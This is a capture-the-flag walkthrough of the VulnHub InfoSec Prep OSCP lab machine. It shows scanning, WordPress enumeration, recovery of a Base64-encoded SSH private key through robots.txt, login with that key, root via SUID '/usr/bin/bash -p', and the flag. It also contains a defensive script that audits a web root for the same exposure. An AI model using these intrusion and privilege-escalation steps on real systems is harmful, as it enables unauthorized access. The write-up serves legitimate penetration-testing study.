
【攻略鴨】InfoSec PrepOSCP_VulnHub target machine walkthrough

2023-01-05 10:35 Author: 攻略鴨

The content of this article is purely fictional. Please follow, like and support 攻略鴨 on Bilibili!

Test machine IP address: 192.168.31.176

External information gathering

Port scan

22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  socks5  syn-ack ttl 64

WordPress 5.4.2 blog content

XYZ Doohickey Company
a bike messenger
dog named Jack
live in Los Angeles
like piña coladas
user:oscp
Posting replies to blog entries is enabled
Search function: http://192.168.31.176/?s=
Login page: http://192.168.31.176/wp-login.php

wpscan --url http://192.168.31.176/ --enumerate vt,vp,u

Apache/2.4.41 (Ubuntu)

Known user: admin

robots.txt

http://192.168.31.176/robots.txt

Disallow: /secret.txt

/secret.txt


Base64 decoding

$ base64 -d test.txt > test2.txt

Result:

-----BEGIN OPENSSH PRIVATE KEY-----
xxx omitted xxx
-----END OPENSSH PRIVATE KEY-----

It is an OpenSSH private key.
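
The chain above (a robots.txt Disallow entry leading to a Base64-wrapped OpenSSH private key) can be checked for from the defender's side. The following is an added example, not part of the original post; the function names has_private_key and audit_webroot, the PEM pattern, and the demo web root with its placeholder key text are assumptions made here.

```shell
#!/bin/sh
# Added example, not from the original post: audit a web root for the exposure
# in this walkthrough, a robots.txt Disallow entry pointing at a file that
# holds private-key material as plain PEM or as Base64-wrapped PEM.

PEM_RE='-----BEGIN [A-Z0-9 ]*PRIVATE KEY-----'

# has_private_key FILE: succeed if FILE contains a PEM private-key header,
# directly or after one layer of Base64 decoding.
has_private_key() {
    if grep -Eq -e "$PEM_RE" "$1"; then return 0; fi
    # Remove whitespace so line-wrapped Base64 decodes as one stream; decode
    # errors are expected for ordinary files and are discarded.
    tr -d ' \t\r\n' < "$1" | base64 -d 2>/dev/null | grep -Eaq -e "$PEM_RE"
}

# audit_webroot DIR: print each robots.txt Disallow path under DIR that is a
# regular file containing private-key material.
audit_webroot() {
    root=$1
    if [ ! -r "$root/robots.txt" ]; then return 0; fi
    tr -d '\r' < "$root/robots.txt" |
        awk -F'[: \t]+' 'tolower($1) == "disallow" && $2 != "" { print $2 }' |
        while IFS= read -r path; do
            case $path in *..*|*'*'*) continue ;; esac  # skip traversal, wildcards
            if [ -f "$root$path" ] && has_private_key "$root$path"; then
                printf '%s\n' "$path"
            fi
        done
}

# Demo on a constructed web root; the key body is placeholder text, not a key.
demo() {
    d=$(mktemp -d)
    printf 'User-agent: *\nDisallow: /secret.txt\n' > "$d/robots.txt"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'CONSTRUCTED-PLACEHOLDER' \
        '-----END OPENSSH PRIVATE KEY-----' | base64 > "$d/secret.txt"
    audit_webroot "$d"
    rm -rf "$d"
}
demo
```

Run against a real document root, audit_webroot prints every Disallow path that needs to be removed from the web root and whose key needs rotating.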

Connecting with the OpenSSH private key

mv test2.txt id_rsa
sudo ssh -i id_rsa oscp@192.168.31.176
yes
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

Privilege escalation

Local information gathering

find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

SUID privilege escalation with bash: /usr/bin/bash appears in the SUID list above, and the -p option makes bash keep the effective UID instead of dropping it.

bash-5.0$ /usr/bin/bash -p
bash-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)

Other

flag

cat flag.txt
d73b04b0e696b0945283defa3eee4538
